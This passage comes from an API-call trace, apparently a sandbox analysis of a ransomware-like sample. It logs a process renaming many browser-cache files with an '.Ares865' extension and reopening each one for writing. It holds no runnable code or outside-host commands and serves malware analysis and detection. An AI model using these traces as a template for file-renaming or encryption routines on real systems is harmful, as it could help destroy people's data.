HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png.Ares865") returned 117 [0094.646] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png.ares865"), dwFlags=0x1) returned 1 [0094.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.648] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=749) returned 1 [0094.651] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png.Ares865") returned 117 [0094.651] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png.ares865"), dwFlags=0x1) returned 1 [0094.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.652] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=414) returned 1 [0094.656] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png.Ares865") returned 117 [0094.656] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png.ares865"), dwFlags=0x1) returned 1 [0094.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.657] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=705) returned 1 [0094.660] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg.Ares865") returned 117 [0094.660] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.664] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1976) returned 1 [0094.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png.Ares865") returned 117 [0094.666] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png.ares865"), dwFlags=0x1) returned 1 [0094.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=343) returned 1 [0094.680] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg.Ares865") returned 117 [0094.680] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.684] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14001) returned 1 [0094.687] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865") returned 175 [0094.687] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm.ares865"), dwFlags=0x1) returned 1 [0094.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.689] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=927) returned 1 [0094.692] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js.Ares865") returned 113 [0094.692] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js.ares865"), dwFlags=0x1) returned 1 [0094.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37341) returned 1 [0094.698] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1].Ares865") returned 115 [0094.698] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1].ares865"), dwFlags=0x1) returned 1 [0094.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10356) returned 1 [0094.705] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js.Ares865") returned 123 [0094.705] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js.ares865"), dwFlags=0x1) returned 1 [0094.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.707] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21083) returned 1 [0094.714] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865") returned 146 [0094.714] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.716] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33303) returned 1 [0094.721] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js.Ares865") returned 112 [0094.721] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js.ares865"), dwFlags=0x1) returned 1 [0094.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71739) returned 1 [0094.729] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js.Ares865") returned 118 [0094.729] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js.ares865"), dwFlags=0x1) returned 1 [0094.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.731] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5033) returned 1 [0094.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png.Ares865") returned 117 [0094.734] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png.ares865"), dwFlags=0x1) returned 1 [0094.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=325) returned 1 [0094.738] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png.Ares865") returned 117 [0094.738] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png.ares865"), dwFlags=0x1) returned 1 [0094.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.739] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=438) returned 1 [0094.742] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png.Ares865") returned 117 [0094.742] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png.ares865"), dwFlags=0x1) returned 1 [0094.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.743] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=342) returned 1 [0094.746] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg.Ares865") returned 117 [0094.746] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.748] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5420) returned 1 [0094.751] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg.Ares865") returned 117 [0094.751] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg.Ares865" (normalized: 